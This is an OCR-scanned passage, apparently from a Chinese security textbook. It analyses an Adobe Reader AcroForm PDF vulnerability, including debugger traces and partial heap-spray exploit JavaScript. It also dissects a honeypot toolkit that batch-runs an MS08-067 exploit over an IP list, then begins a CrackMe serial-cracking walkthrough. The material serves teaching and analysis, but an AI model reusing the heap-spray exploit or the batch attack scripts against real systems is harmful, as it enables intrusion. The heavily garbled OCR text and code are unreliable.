了 61616161， 这 也 就 造成 了 栈 溢出 〈 见 图 8-19) ， 这 里 只 要 精确 地 修改 返回 地 址 的 值 就 能 
实现 对 于 程序 的 控制 ， 从 而 执行 想 执 行 的 内 容 ， 修 改 overflow 数 组 的 内 容 如 图 8-20 所 示 。 
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Мозгова: 49010000 49095000 C:\WINDOWS\svstenm32\Msftedit 411 
(238.698): Access violation - code с0000005 (1!!! second chance |!!!) 


влк"0с0с0с28 еБж“00000001 есх=0с0с0с20 ех” 10242074 еғі»10242074 ара: 
1р- 8886888 88 е=р=0012аеа0 еБр-00124е4с 10р1-0 пу up еі рі zr па ре n 
5=001Ь ===0023 айты. анны fs=003b а-0000 211. 00200246 


8-22 ”PDF 漏洞 触发 现场 
这 就 是 案 发 的 时 候 ， 可 以 看 到 目前 内 存 位 置 在 88888888， 其 实 这 时 候 栈 已 经 被 破坏 
了 ，eip 足 转 到 一 个 没有 东西 的 内 存 空间 ， 所 以 程序 崩 江 了。 现在 就 开始 逆 回 还 原 整个 过 
程 ， 通 过 命令 来 回溯 整个 过 程 。 
如 图 8-23 所 示 ， 由 下 往 上 是 依次 调用 关系 ， 就 是 C 语 诗 的 函数 组 套 ， 比 如 说 A 调用 B， 
B 调 用 了 C， 那 么 “ 案 发 ”前 的 那 一 刻 函 数 对 应 的 地 址 是 208as4e0， 用 WinDbsg 奏 看 该 段 函 
数 的 汇编 代码 ， 如 图 8-24 所 示 。 


0:000» kb 

ChildEBP RetAddr Args to Child 

ЧАКНТНС: Frame ТР not іп any known module. Folloving frames вау be wrong 
0012ае9с 208а54е0 00000001 8501909 00000001 (0х88888888 

00124е4с 208а59Һе 0012а#14 10241Ғ44 00000001 АсхгоЕРоги!Р1ааТиНази+0ха3162 
001242144 208а5538 00124488 00000000 00000001 ÀAcxroFoxrm!PlugInMain+Oxa3690 
00124Ғ64 208а5488 0012а#88 04аа4530 00000001 АсхоЕ оти! Р1 чатаНазт+0ха320а 
0012аЁас 20сассс0 00129Ее8 04аз4530 00000001 АсгоҒогһ!РімсіпМаіпғйхаЗ1ба 
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4 

18h 

eax, Offset ÀcroForwKw!DllUnregisterServer+0x42ctftfd (20991619) 
АстоЕ0сти+0х1478 (20801478) 

edi, ecx 

dvord ptr [ebp-10h].edi 

dvord ptr |еБр+10Ь) 

dvord ptr [ebp-14h]. 0 

dvord ptr а 

нок.) h] 


AcroForxiPluginMain+Oxa31f1 (208а551Е) 
еах,еах 

АсгоЕога!РішдіпМаіп%0ха3163 (208а5491) 
езх.4 


20825461 с20400 
6а18 
Ь814164420 
е808с9#5#ї 
8Ь#9 
897440 
#17510 
8365ес00 
#17505 
84454с 


50 

е897000000 

85с0 

7405 
208а548с 83с004 


208а5491 33с0 
20825493 8530 


з 


ТЗ 


- 
г ~ 


eax, eax 
esi. dvord ptr [тах] 


ЕЗ 


208а549а 7403 ) ÀAcroForxm!PlugInMain+Oxa31?71 (208а5494) 
208а549с ##4604 1 dvord ptr [es1+4] 
с?45е4Ь82се820 дуог4 ptr [ebp-1Ch], offset АстоЕога! | Шиагез1зегбегтега)х44е! 
ззаь ерх.еБх 
43 \ еһх 
8444е0 ecx, [ebp-20h) 
89544с dvord ptr [ebp-4]. ebx 
е82е42{8ї{ АсгоЕога!РішдіІпИа1п%0х273Ь4 (208296е2) 
8Ь7+#44 edi, dvord ptr [е91+441] 
854 еді .edi 
7430 j АсхоЕсга ! Р| из пат п+0ха31Ь4 (208а54еЬ) 
837е4400 dvord ptr [е51+44%].0 
740b j àcroFora!PlugInMain+0xa319e (208а54сс) 
#Е75Е0 dword ptr |еБр-10Ь) 
8р4е44 есх,ачота ptr [esi+44h] 


208а54сс #Е4704 i dvord ptr [edi+4] 
208454сЕ 854е44 ecx.dvord ptr [esi+44h] 


208а5444 740а ] ÀcroForm!PlugInMain+Oxa31b2 (208а54е0) 
20885446 #Е 4904 dvord ptr [ecx+4] 
+0ха31Ь2 (208а54=0) 


ТТ руа TO PT Th 
208а544Ь 8Ь01 езх,ачота ptr [ecx] 
208а54д4е ҒҒ10 dvord ptr [еах 
208а54е1 dbet есх.еді 
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画 线 的 部 分 是 笔者 认为 最 重要 的 部 分 ， 为 了 方便 大 家 理解 ， 用 一 个 流程 图 来 简化 上 面 
的 过 程 ， 如 图 8-25 所 示 。 


сай AcroForm!PluglInMain+0xa31fl(eax) retum eax 
[eax+4] 
= [esi+44h]= [еах+4+44һ] 


вах =[ecx] = [esir44h] = [eax+4+44h] 


сай eax 漏洞 触发 
图 8-25 PDF 漏洞 触发 流程 
由 图 8-25 可 以 看 到 漏洞 触发 的 原因 就 在 于 AcroFormIPlugInMain+0xa31f1 返 回 的 eax， 
经 过 多 次 赋值 后 ，eax 被 改变 了 。 因 为 这 个 改变 ， 导 臻 最 后 call eax 的 时 候 使 程序 跳 转 到 了 
88888888， 此 时 栈 已 经 被 破坏 了 。 用 IDA Pro 来 加 载 这 个 存在 漏洞 的 AcroForm.api， 查 看 这 
段 函数 的 伪 代 码 〈 见 图 8-26) 。 


int _ stdcall sub 208й551Ғ(іпЕ a1, int a2, int аз) 


sub 208й553Ғ(а1, a2, аз, 08, 8); 
| return а1; 


, 
8-26 ”PDF 漏洞 触发 时 伪 代 码 

其 实 通过 上 面 的 汇编 语句 也 不 难看 出 eax 作 为 这 个 函数 第 一 个 参数 被 传 入 ， 经 过 这 个 
函数 的 执行 ， 第 一 个 参数 又 被 返回 ， 然 后 继续 上 面 的 流程 ， 这 个 参数 被 传 入 后 又 进行 
了 sub 208A553F 这 个 函数 的 一 系列 操作 。 由 于 笔者 没有 下 载 符 号 表 ， 所 以 无 法 告诉 大 家 
函数 的 名 字 ， 这 个 函数 里 面 的 代码 有 100 行 左右 ， 具 体 分析 过 程 笔者 就 不 蒙 述 了 ， 其 大 
致 功能 其 实 就 是 创建 一 个 新 的 对 象 指针 ， 并 且 分 配给 这 个 指针 64 Byte 的 内 存 ， 如 图 8-27 
所 示 。 

v24 = ж( DWORD #)(922 + 4)-- == 1; 


if ( v24 ) 
(ww(uoid ( cdecl зе) ( DWORD, DWORD}}v22}(1 


} 
025 = 546 2988 8948Е (64); 


ж( BYTE #)(а1 - 8) = 8; 
if ( 25 == 97 ) 
926 = 9; 
else 
926 = sub 20829301(97, al - 24, 97); 
*( BYTE *)(а1 - 4) = 6; 
if ( 926 ?= у? ) 
++*( DWORD *)(u26 + 4); 
927 = #( DWORD *)(a1 - 64); 


8-27 pdf 漏洞 触发 指针 空间 分 配 异 常 点 伪 代 码 
我 们 可 以 用 IDA Pro 看 到 分 配 空间 的 过 程 ， 其 实 这 里 用 汇编 看 可 能 更 清晰 〈 见 医 
8-28) 。 


208а5720 6Ба40 


208а5722 eße83cf6ff са11 ÀCroForm!PlugInMain+Oz70e1 (20809404) 


—= А — 
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push 40h 就 是 将 分 配 内 存 空间 的 大 小 作为 参数 传 入 ，40h 转 换 成 十 进 制 就 是 64， 
而 下 面 call 的 函数 其 实 就 相当 于 C 语 言 中 的 malloc， 只 不 过 malloc 是 动态 分 配 空 间 。 
再 回 到 之 前 的 流程 图 中 ， 问 题 就 来 了 ，eax+4 作 为 这 个 指针 的 起 始 被 传 出 赋值 给 了 esi， 然 后 
esi+44h 赋 值 给 了 ecx， 而 其 实 这 个 指针 的 大 小 只 有 40h， 这 就 造成 了 内 存 地 址 越界 ， 导 致 了 漏 
洞 的 触发 ， 那 么 只 要 想方设法 构造 这 个 越界 位 置 中 的 值 就 可 以 完成 对 这 个 漏洞 的 利用 。 

利用 漏洞 部 分 只 做 简要 的 说 明 ， 因 为 会 涉及 ROP 链 的 构造 ， 而 且 这 个 漏洞 的 利用 其 实 
也 伴随 大 男 一 个 内 存 泄露 基 址 的 漏洞 ， 以 此 来 绕 过 DEP 和 ASLR 保 护 。 其 实 该 漏洞 本 身 就 
己 具 备 了 绕 过 ASLR 的 功能 ， 但 是 由 于 构造 畸形 数据 的 特殊 性 ， 如 果 单 用 这 个 漏洞 只 能 者 
盖 少 量 的 shellcode， 而 利用 这 个 漏洞 会 用 到 正常 用 的 heap spray， 也 就 是 对 喷 技 术 ， 来 看 看 
它 的 内 存 空 间 变 成 了 什么 〈 见 图 8-29) 。 


0с0с0с28 88 88 88 88 28 Ос Ос 0с 28 Oc Oc 0с 28 Oc Oc Oc ....( 
0с0с0с38 28 Oc Ос Ос 28 Ос Ос Oc 28 Ос Oc Oc 28 Ос 0с 0с (...(.. 
0с0с0с48 28 Oc Ос Oc 28 Ос Ос 0с 28 Ос Oc 0с 28 Ос Oc Oc (...(... 
0с0с0с58 28 Oc Oc Oc 28 Oc Ос Oc 28 Ос Ос Oc 00 00 00 00 (...( 
0с0с0с68 00 00 00 00 оо 00 оо 00 оо 00 00 00 00 00 00 00 ................ 
0с0с0с78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0с88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с0с98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0са8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0сь8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0сс8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0с48 00 00 оо оо оо оо 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0се8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0сЕ8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00.00 ................ 
0с0с0408 00 00 оо оо оо оо оо 00 оо 00 00 00 00 00 00 00 ................ 
0с0с0418 00 00 00 00 00 00 00 00 28 Ос Ос Oc 01 00 00 00 ........ 
0с0с0428 88 88 88 88 28 0с Oc Oc 28 0с Oc Oc 28 Oc Oc Oc ....( 
0с0с0438 28 0с 0с 0с 28 0с Ос Ос 28 Ос 0с йс 28 Ос 0с 0с (...(... 

( 

( 


епо ов в а"е.в 


ТРЕЯ T. 


раз 


0с0с0448 28 0с Ос Oc 28 0с Ос Ос 28 0с Ос Oc 28 Ос 0с 0с (...(.. 
0с0с0458 28 Oc Oc Oc 28 Oc Ос Oc 28 0с Ос Oc 00 00 00 00 (...(... 
0с0с0468 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00’................ 
0с0с0а78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0488 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0498 00 00 оо 00 оо 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с09а8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с04ь8 00 00 оо оо оо оо оо 00 00 00 00 00 00 00 00 OÜ ................ 
0с0с04с8 00 00 00 оо оо оо оо оо оо 00 00 00 00 00 00 00 ................ 
0с0с044а8 00 00 оо оо оо оо оо оо оо 00 00 00 00 00 00 00 ................ 
0с0с04е8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0ағв 00 00 00 оо оо оо оо оо оо 00 00 00 00 00 00 00°................ 
0с0с0е08 00 00 00 00 00 00 оо 00 00 00 00 00 00 00 00 00 ................ 
0с0с0е18 00 00 00 00 00 00 00 00 28 Ос Ос Oc 01 00 00 00 ........ 
0с0с0е28 88 88 88 88 28 Ос Ос Ос 28 Ос Ос tc 28 Ос Oc Oc ....( 
0с0с0е38 28 Oc Ос Oc 28 Oc Ос Oc 28 Ос Ос Oc 28 Oc Oc Oc (...(... 

( 

( 


а-а в: е я 


п. 


0с0с0е48 28 Ос Oc Oc 28 Ос Ос Oc 28 Ос Ос Ос 28 Oc Oc (с (...(.. 
0с0с0е58 28 Oc Ос Oc 28 Oc Ос Oc 28 Ос Ос Oc 00 00 00 00 (... 
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这 段 喷射 代码 在 POC 中 也 有 体现 ， 我 们 用 Ultra Еау РОС. 


var dataNodes = (1; 

var uiListNodes = []; 

мас choiceListNodes = []; 
var contentAreas = []; 
var strArray = []; 

var cntArea = 147; 


var ggg; 


var gFakePointer = 0x0c0c0c20; 
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var gTargetEip = 0х88888888; 


var padding = ипезсаре ("Зиррррь"); 


while ( padding-length < (449*2+2*29*11) ) {padding += padding; 
padding = padding.substring(0, (449*2+2*29*11)); | 
function DwordToString( val ) { 
return String.fromCharCode ( val & OxFFFF ) + String.fromCharCode 
( (та! >> 16) Е ОХЕЕЕЕ |: 
} 


function HighWord( val ) { 
return String.fromCharCode ( (val >> 16) & OxFFFF ); 


var contentAreas = []; 

Ғипсііоп А11осаіеСопіепіАгеа ( спі ) { 
var name = "contentArea"; 

for ( var і = 0; 1 < спі; і ++ ) 4 


сопгептАгеаз.риз1 ( хѓЁа.ёетр1абе .сгеаіећоае (name, "七 ") ); 


Function А11осаіереҒесііуећойеѕ ( ҒакеРоіпіог ) | маг thunk = 
DWordToString( ҒакеРоіпіог ); while (thunk.length < 
а т=п: 
А|ТосатеСопГепГдАгеа( (2*2*2*2*2*2*2*2*2) |; 
var lastWord = HighWord( ҒакеРоіпіог ); 
var АЕЕЕСТТУЕ = []; 
for (var index = 0; index < 40; іпаех++) (| 
АЕРЕСТТУЕ -ризЬ ( thunk.substring( 0, ((47*2*7*5*2*2*2*2) 
/ 2) - 3) + lastWord + padding ); } 
AllocateContentArea( CntArea ); 
} 
function Trigger( fakePointor ) (| 
AllocateDefectiveNodes( fakePointor ); 
var node = 


xfa.resolveNode ("xfa[0].form[0] .form1[0] .#pageSet [0] .раде1 [0]. 
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Tsubform[0] .Не1а0[0] .#01"); 
1Е ( поае == џпаейпеа ) | 
return false; 
} 
Егу { 
node.oneOfChild = choiceListNodes.pop (); 
} 
catch (е) | 
return false; 
} return true; 
} 
Гипсілоп СО) | 
арр.а1ег® ("до"); 
for (var i = 0; 1 < 5; ++ i) Trigger( дЕакеРо1п ег ); } 
Ашс оп Start () { Рог (мағ іпдех = 549; іпдех >= 1; іпдех--) (маг поде = 
х Ға. гезо1уеМоае ("ха [0] . Еогм [0] . Ғогт1 101. РЕрачезе [0] 
раде1 [0] .#subform[0] .field™" + index.toString() + "101.#11101"); 
uiListNodes .push (пойе); маг посе = 
xfa.resolveNode ("хҒа [0] .form[0] .Еоги1 [0] .#радебеї [0] .раде1 [0] .#subform[0] . 
field" + index.toString() + "[0].#ui[0] .#choiceList[0]"); choiceListNodes. 
push (node); } 
х Ға. resolveNodel(" "xrani .Еогм [0] .Еогш1 [0] .150о5Еогм [0] . гесі1"). 
Ккеер.ргеуіоцѕ = "contentArea"; 


ggg = app.setTimeOut ("Со ();", 500); } 
маг blocks = [];function Spray() | 
мас ZERO = DWordToString( 0 ); 
var pTargetEip = DWordToString( gFakePointer + 8 ); 
var blocksize = 0x400000 - 0x38; 
var trunk = pTargetEip; 
trunk += DWordToString( 0x00000001 ); //геҒегепсе count 
trunk += DWordToString( gTargetEip ); //сопіко1 eip 
while ( trunk.length < 0x44 / 2 ) trunk += pTargetEip; 


trunk = trunk.-substring ( 0, 0х44 / 2); 
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trunk += 7ЕВО; // [ЕакеРоіпіег + 0х48] = пи11 


while ( trunk.length < 0x100 / 2 ) trunk += ZERO; 
Cronk = ЕгипКк.зирзЕгапа (0, 0х100 / 2); 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 


ET 
blocks .push (trunk.substring (0, (blocksize/2)-2)+pTargetFip ); 
} 
//5ргау ѕһе11соае 
/* 
trunk = рТагдекЕір; 
while ( trunk.length < 0х1000 ) trunk += trunk; 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 
Тат Dy rira D upp Е 
blocks .push (trunk.substring (0, (blocksize/2)-2)+pTargetEip ); 
) 
ы 4 


} 


笔者 给 大 家 展示 了 部 分 堆 喷 的 代码 ， 相 信 对 Web 略 有 研究 的 谈 者 可 能 会 很 熟悉 ， 这 是 


用 JavaScript 完 成 的 ， 正 浏览 器 多 数 情 况 下 也 是 利用 堆 喷 技术 来 绕 过 ASLR， 其 中 填充 大 量 
内 存 块 喷射 0c0c 的 过 程 也 是 用 JavaScript 完 成 的 。 


全 此 ， 简 单 的 漏洞 分 析 束 完成 了 ， 其 实 这 中 间 包 含 了 成 百 上 千 次 的 反复 调试 ， 对 各 个 


寄存 器 的 值 都 要 有 清醒 的 认识 ， 而 且 这 个 漏洞 还 有 很 多 很 多 细节 没有 跟 大 家 说 明 ， 比 如 指 
针对 象 的 格式 ，esi+44h 布 置 了 什么 东西 ， 感 兴趣 的 谈 者 可 以 去 网 上 搜索 一 下 。 


8.2 МШ ТОЛА 


821 ТРЕ НАНА ТЕН 


РЕН ЖЕ ЕЗДУ Е Гб, ЗЕ Е РН, hyr t h À W 


成 了 “肉鸡 ”， 虽 然 设 置 了 快照 但 是 一 直 没 有 还 原 过 ， 一 直 想 看 看 能 不 能 拿 到 有 价值 的 
exploit。 前 两 天 有 一 个 黑客 在 笔者 的 蜜 饶 里 摆 了 一 个 工具 包 ， 还 设置 了 密码 ， 这 个 工具 包 
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是 付费 的 ， 笔 者 首先 想到 了 0day， 也 许 这 个 黑客 掌握 0day 呢 ， 于 是 笔者 果断 把 工具 包 拿 了 
出 来 逆 回 分 析 了 一 下 。 

工具 包 里 是 一 个 需要 输入 密码 的 exe， 不 多 说 直接 放 到 OllyDbg 里 跑 一 下 看 看 能 不 能 得 
到 密码 ， 程 序 入 口 直接 是 Pushad， 按 F8 键 单 步 执行 几 步 之 后 就 直接 返回 了 ， 于 是 首先 想到 
的 是 加 壳 ， 放 到 PEiD 里 看 一 下 〈 见 图 8-30) 。 

果然 是 加 过 了 ， 还 好 是 UPX 壳 ， 现 在 脱 UPX 壳 的 脱 壳 机 可 以 轻易 搜索 和 下 载 ， 就 不 讲 
手动 脱 壳 的 过 程 了 ， 将 UPX 壳 脱 掉 之 后 再 用 PEiD 跑 一 下 看 看 〈 见 图 8-31) 。 


Ап: РЕС Ми о | Лав: ЕР Б. 
文件 偏 移 : В: 文件 偏 移 : В. 
连接 器 版 本 : 子 系统 : 连接 器 版 本 : 子 系统 : 


什么 神权 找到 ж 


总 在 最 前 (5) m УЖЕ) 总 在 最 前 (S) Ге CEES) (2) 
图 8-30 ”PEiD 显 示 加 壳 情 况 图 8-31 UPX 脱 壳 后 PEiD 显 示 情 况 


EP 段 的 值 是 .code 说 明 UPX 壳 已 经 正常 脱 掉 ， 将 脱 壳 后 的 程序 放 到 OllyDbg 里 跑 起 来 ， 
刚 开 始 这 个 程序 只 是 从 寄存 器 读 取 了 一 些 参 数 ， 直 接 按 F9 键 让 程序 完全 跑 起 来 。 

经 过 反 汇 编 调 试 ， 可 以 看 到 这 个 程序 跑 起 来 后 在 C 盘 下 的 一 个 隐藏 一 个 目录 里 创建 了 
名 为 1.tmp 的 文件 夹 〈 见 图 8-32) ， 同 时 创建 了 一 个 名 为 01.bat 的 脚本 ， 然 后 它 将 这 个 脚本 
运行 了 起 来 。 接 下 来 我 们 到 C 盘 下 的 这 个 目录 里 看 看 这 个 脚本 的 内 容 ( 见 图 8-33) 。 


мона 


КРУС РИЧЕ 


22 bBp— Tami 
Ө 村 这 个 文件 天 发 到 
“ 


color 
title 出 人 名 种 发 包 , 通 杀 机 器 需要 的 联系 q: 


echo. 


ОЁҒ 
for /Е 341 іп (ips.txt) до (start 02.bat 141) 


8-33 ”隐蔽 目录 下 脚本 内 容 
简单 看 一 下 这 个 脚本 的 内 容 ， 其 中 %var% == "520." 的 if 语句 中 暴露 了 这 个 程序 的 密 
19, in (ips.txt) do (start 02.bat %%i) 说 明 当 密码 判断 成 功 后 ， 将 对 ips.txt 中 保存 的 卫 
地 址 执行 02.bat 脚 本 。 现 在 马上 打开 02.bat 脚 本 ， 看 看 脚本 的 内 容 〈 见 图 8-34) 。 
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„®в®_шышжышн=е 1 


МР (Е) 编辑 还 ) PAO Ж (у) ТН 


图 8-34 ”跟踪 生成 的 02.bat 脚 本 
从 图 8-34 可 以 看 到 这 个 脚本 在 执行 cs.exe 文 件 ，%1 是 它 的 参数 ，nc 就 是 常见 的 nc 链接 
工具 。 直 接 输 入 520. 密 码 ， sd li ( 见 图 8-35) . 


CrxAWINDOWSVsystesa32Vcad еке - 02.Б 12 = 


125. 64.0.0 


28-35 工具 追踪 
至 此 ， 这 个 所 谓 的 收费 工具 的 真面目 全 部 显示 了 出 来 ， 原 来 就 是 emm 大 牛 在 2008 年 写 
的 MS08067 的 exploit， 这 个 收费 工具 现在 网 上 随处 可 见 ， 其 实 就 是 写 了 个 批量 的 脚本 ， 并 
没有 什么 0day。 


822 ”从 CrackMe 到 逆向 破解 技术 


CrackMe 其 实 是 一 些小 程序 ， 公 开 给 别人 尝试 破解 ， 编 写 CrackMe 的 人 可 能 是 程序 
员 、 黑 客 等 ， 他 们 可 能 是 为 了 验证 目 己 的 程序 安全 性 ， 也 可 能 为 了 挑战 其 他 黑客 的 水 平 ， 
最 终 形成 了 破解 技术 中 CrackMe 的 独特 文化 。CrackMe 简 称 CM， 也 存在 CM 竞赛 形式 ， 多 
见于 一 些 论坛 。 
接 下 来 ， 通 过 对 一 个 CrackMe 破 解 过 程 的 分 析 ， 加 深 谈 者 对 破解 技术 的 理解 ， 该 
CrackMe 如 图 8-36 所 示 。 
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МДҮ ЧА жазтенжнт 


图 8-36 来自 看 雪 论 坛 发 布 的 Crackme-160.chm 
首先 运行 一 次 CrackMe， 是 一 个 普通 的 序列 号 程序 。 
+: 这 个 CrackMe 的 作者 有 点 偷懒 了 ， 上 面 那 行 相当 于 输入 ， 下 面 那 行 是 需要 算 的 序 
15, ж 837 F. 
А СгасЕШе 


Registration Information 


Enter | 
Enter | 


8-37 程序 界面 
首先 用 PEiD 检 查 一 下 ， 结 果 如 图 8-38 所 示 。 
"Е PEiD у0. 95 


Не: C:\Documents апа 5ettingsWM = [Ш\Вгай 5оЫезКу.2.ехе A 


Entrypoint: 00001Е00 EP Section: text 
File Offset: 00001Е00 First Bytes: 55,98,ЕС,6А 
Linker Info: 6.0 Subsystem: Win32 GUI 


Microsoft Visual C++ 6.0 


м |[ кє | 
ЖТ. 


图 8-38 ”PEiD 查 询 结 果 
从 图 8-38 中 可 以 看 到 ， 这 是 一 个 没有 充 的 程序 ， 用 VC++ 6.0 编 译 。 
首先 要 找到 计算 序列 号 的 部 分 ， 既 然 没 有 充 我 们 就 可 以 直接 用 OD 载 入 。 
这 个 程序 下 断 点 的 方法 很 多 ， 这 里 举 几 个 例子 。 


1. 查找 参考 字符 串 ( 见 图 8-39 ) 


Пзжтъзжиат Brad 50оБ:. Тех? 


00101305 push Brad 500 . 00102052 

804014E4| push Brad 500 . 080402 ВВЕ 

90401570 push Brad 500. 00304020 “скаские“ 

9094091582 push Brad 500 . 00404028 “User Name must һауе at least 5 characters." 
8840161Е push Brad 506. 8884854 "10" 

99401669 | mou есі,Вғай 500 . 003085058 “Correct?? 

0010168Е | mou есі,Вғай 5оһ.00505078 "<BrD-SoB> 


00101683 mou esi,Brad Sob . 00304098 "Incorrectt+, Try Again." 
00401601 | mou есі,Вғай Sob .60694986BB “Correct мау Со до, You Got It." 
994 016ЕЗ | push Brad 500 . В0ц 408 "СбғаскНе" 

884081765! push Brad 500 . 8884808 "“скаские“ 

80Ң01Е10| sub езр, 90х68 (初始 CPU 选择 ) 

99481Е75 | push 09х10000 UNICODE "=::=::\" 


8-39 查找 参考 字符 串 
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从 图 8-39 可 以 看 到 “User Маше must have at least 5 characters.” “Сопеси way to го, 
You Get It.”“Correct!” 这 几 个 比较 可 疑 的 字符 串 ， 对 每 个 附近 的 代码 人 简单 跟踪 分 析 一 下 
就 能 找到 关键 跳 转 的 位 置 ， 这 里 不 再 资 述 。 


经 分 析 可 知 ， 计 算 序 列 号 的 代码 在 这 


E9 Ғ9010000 ]тр Brad Sob .86064817B7 

C745 Ей 09090061 mov dword ptr се: |ебр-0х281|,8х9 

ЕВ 99 jmp short Вғай 500. 80301500 

:8855 ЕЙ тоу edx,dword ptr 55: [ебр- 09х20] 

8322 01 add едх, 0x1 

8955 ЕЙ mou мака ptr <<: [еБр-0х280] ,edx 

8845 ЕЙ mov eax,dword ptr 55 : [ебр- 9х201 

3845 Е стр eax,dword ptr 55: [ебр- дх1С1 
jge short Brad Зов. 001016514 


90401589 |, 
981015 ВЕ 
88581505 
80501507 


mou есх,Пшағй ptr $$ :[ебр- 68х28] 
push есх 

Теа ecxydword ptr 55 :[ебр- 6514] 
call Вкай Хор 00:81900 

поузх еах,а1 

mou eax,dword ptr 55 :|ебр- 0х10] 
add еах,ейх 

mou dword ptr 55: | ерр-йх1 | ‚еах 
mov ecx,dword ptr $$ :Герр-0х20] 
shl ecx, 8x8 

mou edx, ,dword ptr <<:Геһр-йх1й1 
хо едх „есх 

mou dword ptr ss:[ebp-0x180],edx 
mov eax,dword ptr 55 :|ебр- 8281 
add вах, Йх1 

mov ecx,dword ptr ss:[eDp-0x1C] 
imul ecx,dword ptr 55: ерр- 90х20] 
поЕ есх 

imul еах„есх 

mov edx,dword ptr 55 :Гебр- 09х19] 
imul едх,сах 

mou dword ptr $55: |ебр-йх1й| ,edx 
jmp short Brad 501). 08ң015С67 


ЕВ 16039098 
ВЕВЕОВ 
88ч5 FÜ 
8362 

8945 ҒИ 
8840 ЕВ 
C1E1 08 
8855 FÜ 
3301 

8955 ЕВ 
88:5 ЕЙ 
взса 01 
8640 ЕҢ 
OFAF4D ЕЙ 
F7D1 
BFRFÚ1 
8B55 ЕЙ 
ӨҒАЕре 
8955 FA 
ЕВ ñD 


90401618 | ° 


部 分 ， 如 图 8-40 所 示 。 
w 


图 8-40” 反 汇编 代码 ( 序列 号 计算 部 分 ) 


2. API A 


尝试 使 用 GetDlgItemTextA、GetMessageA、GetMessageW 等 API， 随 意 输入 一 个 
name， 单 击 Check 验 证 ， 程 序 成 功 在 GetMessageA 处 断 下 。 然 后 按 Ctrl+F9 组 合 键 返 回 ， 找 
到 程序 领空 内 调用 的 代码 ， 癌 下 寻找 验证 部 分 ， 或 者 按 Alt+K 组 合 键 打 开 堆 栈 调用 窗口 


( 见 图 8-41) 。 


hWnd = 
Buffer = 
Count = 


99383838 
9х9 


99127600 | 805015561? < пр .ЕМЕСЦ2 .#3097> 


88-41 


mfC42 .73D8DABF 


88840158 (class="Edit" ‚рак 


Вғай 500 . 90491551 


调用 堆栈 窗口 


从 图 8-41 中 可 以 看 到 程序 领空 内 调用 堆栈 的 函数 地 址 为 00401556， 双 击 跟 入 ， 结 


果 如 图 8-42 所 示 。 


9848107Е|- FF25 4831409090 | јтр dword ptr ds:[<&NFC42 
99491084 |- FF25 50218008 | jmp dword ptr ds:[<&MFC42 
9948108 - FF25 50314000 | упр dword ptr ds:[<&MFC42 
99491098|- FF25 5431409090 | пр dword ptr 05: [<&МЕСН2 
AALAINNA ссос соохиппа imn дала пы 4Я4с-Г/РЫСГИІ9 


.#2818>] пЕсц2 .#2818 
- #5223] пЕсц2 . #4224 
-#3097> ] ЕСА .#3097 
-#537>] пЕсц2 .#537 

наз дохл тсе? M14140 


88-42 ”跟踪 代码 
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从 图 8-42 中 可 以 发 现 编译 器 罗列 的 API 的 入 口 ， 接 下 来 可 以 按 Ctrl+R 组 合 键 查找 调用 
这 段 代 码 的 参考 〈 见 图 8-43) 。 


Г] 湖 老 位 于 Brad Sob:.text 于 00401р8А 


90491551 | call <jmp.&MFC42.#3097> 
90491565 | са11 < тр .аМЕСЦ2 .#3097> 
90401088 | jmp dword ptr 05: «ЕМЕСЦ2 .#3097>] (ЗЕ CPU 选择 : 


图 8-43 ”查找 参考 
分 别 跟 入 两 个 call 语 句 ， 分 析 附 近代 码 可 知 在 第 2 个 call 语 句 下 面 的 是 验证 序列 号 的 
程序 。 
找到 计算 序列 号 的 代码 之 后 ， 我 们 在 计算 处 上 方 及 中 途 下 断 点 ， 如 图 8-44 所 示 。 


short Brad Sob .88481508 
edx ,dword ptr 55:|ебр- 8х2й| 
edx, 9х1 
dword ptr 55: [ебр- 09х28] ,edx 
еах ,dword ptr 55: [ебр- 98х28] 
еах ,dword ptr 55 :|ебр- Вх1С | 
short Вкад 500 . 8840161 
ecx ,dword ptr 55:|ебрр- 8х2й| 
push есх 
Теа ecx,dword ptr 55: [ебр-0х12] 
call Brad 500.00481988 
поубх edx ,al 
еах ,dword ptr 55:|ебр- 09х19] 
еах „ейх 
dword ptr 55: [ебр- 8х18| ‚еах 
ecx,duord ptr 55: [ебр- 08х20] 
ecx, 9х8 
ебх ,dword ptr 55: [ебр- 68х19] 
едх „есх 
ашаға ptr 55: [ебр- 09х10] ,edx 
еах ,dword ptr 55: [ебр- 09х29] 
еах ‚ 9х1 
ecx ,dword ptr ss:[ebp-0x1C] 
imul ecx ,dword ptr 55: [ебр- 09х28] 
not есх 
imul еах,есх 
mou edx ,dword ptr 55: [ебрр- 08х10] 
imul edx ,eax 
тоу dword ptr 55:Геһр-8х18|,ейх 
jmp short Brad Sob .804815С7 
00640161A 8B45 FO пау eax ,dword ptr ss:[ebp-0x18] 


图 8-44” 断 点 位 置 
人 简单 阅读 代码 可 以 发 现 ， 程 序 用 循环 来 计算 序列 号 ， 假 设 程序 需要 根据 每 位 输入 的 字 
符 来 计算 (其 实 的 确 是 这 样 )， 所 以 可 以 把 断 点 下 在 循环 的 首部 ， 然 后 输入 有 规律 的 数据 
(比如 这 里 笔者 输入 的 是 abcdefg， 之 所 以 要 这 样 做 是 为 了 找到 程序 在 哪里 是 否 读 入 每 位 
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АЯ)» ， 单 击 Check 按 钮 让 程序 断 下 ,分析 代码 后 可 以 得 到 这 些 关 键 位 置 ( 见 图 8-45) 。 


8080155), 


004015Са 
984815С0 
994591508 
99491503 
994591506 
909491508 


9848150С 
998491502 
004015E4 
